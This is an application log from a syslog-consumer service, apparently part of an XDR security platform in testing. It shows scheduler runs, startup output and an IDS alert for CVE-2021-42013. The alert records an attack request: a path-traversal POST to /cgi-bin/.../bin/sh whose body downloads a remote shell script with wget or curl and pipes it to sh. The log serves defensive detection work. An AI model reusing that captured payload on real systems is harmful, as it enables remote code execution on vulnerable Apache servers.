2026-05-19 12:49:00.576 [log-processor-8] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:40:16.894
2026-05-19 12:49:20.178 [http-nio-8089-exec-4] INFO com.controllers.SyslogPushController - 收到syslog发送请求: SyslogRequest{ip='192.168.0.124', port=514, logContent='<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"安恒", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"安恒APT攻击(网络战)预警机", "deviceProductType":"入侵检测系统", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"中国", "srcGeoRegion":"香港", "srcGeoCity":"香港", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"中国", "destGeoRegion":"香港", "destGeoCity":"香港", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013)", "alarmType":"WEB攻击->路径遍历", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013). 来源:192.168.101.1/41614, 目的:192.168.101.173/80"}', protocol='TCP', facility='USER', severity='INFO'}
2026-05-19 12:49:20.179 [http-nio-8089-exec-4] INFO com.common.service.SyslogService - 开始发送syslog消息: IP=192.168.0.124, Port=514
2026-05-19 12:49:20.179 [http-nio-8089-exec-4] INFO com.common.service.SyslogService - TCP Syslog消息发送成功: 192.168.0.124:514
2026-05-19 12:49:20.179 [http-nio-8089-exec-4] INFO com.controllers.SyslogPushController - Syslog消息发送成功: IP=192.168.0.124, Port=514
2026-05-19 12:50:00.014 [scheduling-10] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:50:00.014 [scheduling-7] INFO c.c.s.ProbeStatusCheckScheduler - ========== 开始探针状态检查 ==========
2026-05-19 12:50:00.014 [log-processor-9] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:50:00.087 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 12:50:00.238 [scheduling-10] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:50:00.239 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:1,耗时:152ms
2026-05-19 12:50:00.239 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T12:50:00.239
2026-05-19 12:50:00.239 [scheduling-2] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T12:50:00.239
2026-05-19 12:50:00.241 [log-processor-9] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:50:00.242 [scheduling-7] INFO c.c.s.ProbeStatusCheckScheduler - 探针状态检查完成,所有探针在线, 耗时: 228ms
2026-05-19 12:50:00.392 [scheduling-7] INFO c.c.s.ProbeStatusCheckScheduler - 探针统计: 总数=1, 在线=1, 离线=0
2026-05-19 12:50:00.394 [scheduling-7] INFO c.c.s.ProbeStatusCheckScheduler - ========== 探针状态检查结束 ==========
2026-05-19 12:50:00.498 [scheduling-10] INFO c.c.service.AccessLogAlertService - 获取到 1 条新的日志数据,时间范围: 2026-05-19T12:40:16.894 到 2026-05-19T12:50:00.238
2026-05-19 12:50:00.498 [scheduling-10] INFO c.c.service.AccessLogAlertService - 开始处理算法: 测试算法3 (ID: 2004083121877696514)
2026-05-19 12:50:00.625 [scheduling-2] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 12:50:00.625 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 386ms
2026-05-19 12:50:00.721 [scheduling-10] INFO c.c.service.AccessLogAlertService - 算法 测试算法3 未检测到告警
2026-05-19 12:50:00.721 [scheduling-10] INFO c.c.service.AccessLogAlertService - 访问日志告警处理任务完成,下次将从 2026-05-19T12:50:00.238 开始处理
2026-05-19 12:50:00.863 [log-processor-9] INFO c.c.service.AccessLogAlertService - 获取到 1 条新的日志数据,时间范围: 2026-05-19T12:50:00.238 到 2026-05-19T12:50:00.241
2026-05-19 12:50:00.863 [log-processor-9] INFO c.c.service.AccessLogAlertService - 开始处理算法: 测试算法3 (ID: 2004083121877696514)
2026-05-19 12:50:00.910 [log-processor-9] INFO c.c.service.AccessLogAlertService - 算法 测试算法3 未检测到告警
2026-05-19 12:50:00.910 [log-processor-9] INFO c.c.service.AccessLogAlertService - 访问日志告警处理任务完成,下次将从 2026-05-19T12:50:00.241 开始处理
2026-05-19 12:51:00.011 [scheduling-7] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:51:00.011 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - 开始执行泛化规则命中时间更新任务,时间:2026-05-19T12:51:00.011
2026-05-19 12:51:00.011 [log-processor-10] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:51:00.232 [log-processor-10] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:51:00.234 [scheduling-7] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:51:00.542 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_data 表统计到 1 条规则命中记录
2026-05-19 12:51:00.542 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_alarm 表统计到 0 条规则命中记录
2026-05-19 12:51:00.542 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - 合并后需要更新的规则数量:1
2026-05-19 12:51:00.558 [log-processor-10] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:50:00.241
2026-05-19 12:51:00.559 [scheduling-7] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:50:00.241
2026-05-19 12:51:00.691 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - 当前启用状态的规则数量:174
2026-05-19 12:51:00.692 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - 开始批量更新,规则总数:174,分批数:1
2026-05-19 12:51:00.849 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - 泛化规则命中时间更新任务完成,更新规则数:1,耗时:838ms
2026-05-19 12:53:24.720 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
2026-05-19 12:53:24.720 [main] INFO com.syslogApplication - Starting syslogApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 33912 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
2026-05-19 12:53:24.724 [main] INFO com.syslogApplication - No active profile set, falling back to 1 default profile: "default"
2026-05-19 12:53:27.580 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 12:53:27.583 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
2026-05-19 12:53:28.183 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 593 ms. Found 1 Elasticsearch repository interfaces.
2026-05-19 12:53:28.190 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 12:53:28.190 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
2026-05-19 12:53:28.340 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
2026-05-19 12:53:28.341 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 148 ms. Found 0 Reactive Elasticsearch repository interfaces.
2026-05-19 12:53:28.357 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 12:53:28.358 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
2026-05-19 12:53:28.545 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
2026-05-19 12:53:28.545 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 177 ms. Found 0 Redis repository interfaces.
2026-05-19 12:53:29.550 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8089 (http)
2026-05-19 12:53:29.563 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8089"]
2026-05-19 12:53:29.563 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
2026-05-19 12:53:29.564 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
2026-05-19 12:53:29.824 [main] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring embedded WebApplicationContext
2026-05-19 12:53:29.826 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 5039 ms
2026-05-19 12:53:29.902 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogApplication.dmColumnService
2026-05-19 12:53:34.783 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 12:53:35.237 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
2026-05-19 12:53:35.253 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
2026-05-19 12:53:35.273 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
2026-05-19 12:53:35.277 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
2026-05-19 12:53:35.336 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
2026-05-19 12:53:42.439 [main] INFO c.c.s.RealtimeAnalysisScheduler - ========== 初始化实时分析调度器 ==========
2026-05-19 12:53:42.463 [main] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer - Starting...
2026-05-19 12:53:43.161 [main] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer - Start completed.
2026-05-19 12:53:43.353 [main] INFO c.c.s.RealtimeAnalysisScheduler - 查询到 1 个实时分析规则
2026-05-19 12:53:51.584 [main] INFO c.c.s.i.RuleExecutionTimeServiceImpl - 规则执行时间已存在,跳过初始化,ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 12:53:51.584 [main] INFO c.c.s.RealtimeAnalysisScheduler - 初始化规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, windowType=tumble
2026-05-19 12:53:51.584 [main] INFO c.c.s.RealtimeAnalysisScheduler - ========== 实时分析调度器初始化完成 ==========
2026-05-19 12:53:51.598 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: public static com.common.service.DeviceDeviceService com.common.service.AccessLogAlertService.deviceDeviceService
2026-05-19 12:53:51.652 [main] INFO c.c.service.AccessLogAlertService - 初始化AccessLogAlertService,上次处理时间: 2026-05-19T12:52:51.652
2026-05-19 12:53:51.884 [main] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:53:52.950 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 12:53:53.209 [main] INFO com.common.util.MyBatisUtil - MyBatis 初始化成功
2026-05-19 12:53:54.173 [main] INFO org.quartz.impl.StdSchedulerFactory - Using default implementation for ThreadExecutor
2026-05-19 12:53:54.186 [main] INFO o.quartz.core.SchedulerSignalerImpl - Initialized Scheduler Signaller of type: class org.quartz.core.SchedulerSignalerImpl
2026-05-19 12:53:54.186 [main] INFO org.quartz.core.QuartzScheduler - Quartz Scheduler v.2.3.2 created.
2026-05-19 12:53:54.188 [main] INFO org.quartz.simpl.RAMJobStore - RAMJobStore initialized.
2026-05-19 12:53:54.188 [main] INFO org.quartz.core.QuartzScheduler - Scheduler meta-data: Quartz Scheduler (v2.3.2) 'quartzScheduler' with instanceId 'NON_CLUSTERED'
Scheduler class: 'org.quartz.core.QuartzScheduler' - running locally.
NOT STARTED.
Currently in standby mode.
Number of jobs executed: 0
Using thread pool 'org.quartz.simpl.SimpleThreadPool' - with 10 threads.
Using job-store 'org.quartz.simpl.RAMJobStore' - which does not support persistence. and is not clustered.
2026-05-19 12:53:54.189 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler 'quartzScheduler' initialized from an externally provided properties instance.
2026-05-19 12:53:54.189 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler version: 2.3.2
2026-05-19 12:53:54.189 [main] INFO org.quartz.core.QuartzScheduler - JobFactory set to: org.springframework.scheduling.quartz.SpringBeanJobFactory@52c22bc5
2026-05-19 12:53:54.381 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
2026-05-19 12:53:54.381 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
2026-05-19 12:53:54.381 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779166434380
2026-05-19 12:53:54.401 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
2026-05-19 12:53:54.401 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
2026-05-19 12:53:54.401 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779166434401
2026-05-19 12:53:54.404 [main] INFO o.a.coyote.http11.Http11NioProtocol - Starting ProtocolHandler ["http-nio-8089"]
2026-05-19 12:53:54.421 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat started on port(s): 8089 (http) with context path '/xdrservice'
2026-05-19 12:53:54.423 [main] INFO o.s.s.quartz.SchedulerFactoryBean - Starting Quartz Scheduler now
2026-05-19 12:53:54.423 [main] INFO org.quartz.core.QuartzScheduler - Scheduler quartzScheduler_$_NON_CLUSTERED started.
2026-05-19 12:53:54.441 [main] INFO com.syslogApplication - Started syslogApplication in 30.246 seconds (JVM running for 34.98)
2026-05-19 12:53:54.680 [scheduling-10] INFO c.c.s.RealtimeAnalysisScheduler - 执行规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, nextTime=2026-05-19T12:51, now=2026-05-19T12:53:54.439
2026-05-19 12:53:54.681 [scheduling-10] INFO c.c.s.impl.AnalysisRuleServiceImpl - 执行实时分析规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 12:53:54.804 [org.springframework.kafka.KafkaListenerEndpointContainer#0-1-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - test-group-app: partitions assigned: []
2026-05-19 12:53:54.870 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - test-group-app: partitions assigned: [test-topic-0]
2026-05-19 12:53:55.154 [scheduling-10] INFO c.c.s.impl.RealtimeAnalysisEngine - 滚动窗口查询范围: 窗口大小=10m,查询时间范围=[2026-05-19 12:43:00, 2026-05-19 12:53:00]
2026-05-19 12:53:55.154 [scheduling-10] INFO c.c.s.impl.RealtimeAnalysisEngine - 开始执行实时规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, batchNo=20260519125354835, windowType=tumble, dataStartTime=2026-05-19 12:43:00, dataEndTime=2026-05-19 12:53:00
2026-05-19 12:53:56.439 [scheduling-10] INFO c.c.s.impl.RealtimeAnalysisEngine - 生成的SQL: SELECT src_ip AS attack_ip,
dest_ip AS victim_ip,
origin_event_name AS alarm_name,
ARRAY_AGG(DISTINCT src_port) AS attack_port,
ARRAY_AGG(DISTINCT dest_port) AS victim_port,
MAX(event_level) AS alarm_level,
MODE() WITHIN GROUP (ORDER BY dest_domain) AS dns_info,
MODE() WITHIN GROUP (ORDER BY origin_event_type) AS alarm_type,
COUNT(dest_ip) AS log_count,
MAX(attack_result) AS attack_result,
ARRAY_AGG(DISTINCT http_req_header) AS http_req_header,
ARRAY_AGG(DISTINCT http_req_body) AS http_req_body,
ARRAY_AGG(DISTINCT http_resp_header) AS http_resp_header,
ARRAY_AGG(DISTINCT http_resp_body) AS http_resp_body,
ARRAY_AGG(DISTINCT http_url) AS victim_web_url,
ARRAY_AGG(DISTINCT id) AS origin_log_ids,
MIN(log_time) AS log_start_at,
MAX(log_time) AS log_end_at,
ARRAY_AGG(DISTINCT device_id) AS device_id,
ARRAY_AGG(DISTINCT payload) AS payload,
TUMBLE(log_time, INTERVAL '10 MINUTE') AS window_time
FROM syslog_normal_alarm AS t
WHERE log_time >= '2026-05-19 12:43:00' AND log_time < '2026-05-19 12:53:00' AND src_ip != '127.0.0.1' AND event_level >= 1
GROUP BY src_ip, dest_ip, origin_event_name, TUMBLE(log_time, INTERVAL '10 MINUTE')
2026-05-19 12:53:56.918 [scheduling-10] INFO c.c.s.impl.RealtimeAnalysisEngine - 规则执行成功: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, processedCount=0, alarmCount=0
2026-05-19 12:53:57.235 [scheduling-10] INFO c.c.s.i.RuleExecutionTimeServiceImpl - 更新规则下次执行时间,ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, windowType=tumble, nextExecuteTime=2026-05-19 13:03:00
2026-05-19 12:53:57.236 [scheduling-10] INFO c.c.s.RealtimeAnalysisScheduler - 本次调度执行规则数: 1, 跳过规则数: 0
2026-05-19 12:54:00.014 [scheduling-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:54:00.014 [log-processor-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:54:00.243 [scheduling-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:54:00.243 [log-processor-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:54:00.921 [log-processor-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:52:51.652
2026-05-19 12:54:00.922 [scheduling-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T12:52:51.652
2026-05-19 12:54:05.873 [http-nio-8089-exec-1] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring DispatcherServlet 'dispatcherServlet'
2026-05-19 12:54:05.873 [http-nio-8089-exec-1] INFO o.s.web.servlet.DispatcherServlet - Initializing Servlet 'dispatcherServlet'
2026-05-19 12:54:05.875 [http-nio-8089-exec-1] INFO o.s.web.servlet.DispatcherServlet - Completed initialization in 1 ms
2026-05-19 12:54:11.543 [http-nio-8089-exec-3] INFO com.controllers.SyslogPushController - 收到syslog发送请求: SyslogRequest{ip='192.168.0.124', port=514, logContent='<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"安恒", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"安恒APT攻击(网络战)预警机", "deviceProductType":"入侵检测系统", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"中国", "srcGeoRegion":"香港", "srcGeoCity":"香港", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"中国", "destGeoRegion":"香港", "destGeoCity":"香港", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013)", "alarmType":"WEB攻击->路径遍历", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013). 来源:192.168.101.1/41614, 目的:192.168.101.173/80"}', protocol='TCP', facility='USER', severity='INFO'}
2026-05-19 12:54:11.543 [http-nio-8089-exec-3] INFO com.common.service.SyslogService - 开始发送syslog消息: IP=192.168.0.124, Port=514
2026-05-19 12:54:11.545 [http-nio-8089-exec-3] INFO com.common.service.SyslogService - TCP Syslog消息发送成功: 192.168.0.124:514
2026-05-19 12:54:11.545 [http-nio-8089-exec-3] INFO com.controllers.SyslogPushController - Syslog消息发送成功: IP=192.168.0.124, Port=514
2026-05-19 12:54:13.589 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO c.Modules.NormalData.SysLogProcessor - 开始处理批次消息,数量: 1
2026-05-19 12:54:14.227 [log-processor-2] INFO c.Modules.NormalData.SysLogProcessor - 收到syslogmessage[receive_time=20260519125411844 device_id=103 device_name=公司开发内部测试探针 vendor=null data_type=json device_collect_id=1]<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"????", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"????APT??????????????????", "deviceProductType":"????????", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"?й?", "srcGeoRegion":"???", "srcGeoCity":"???", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"?й?", "destGeoRegion":"???", "destGeoCity":"???", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", 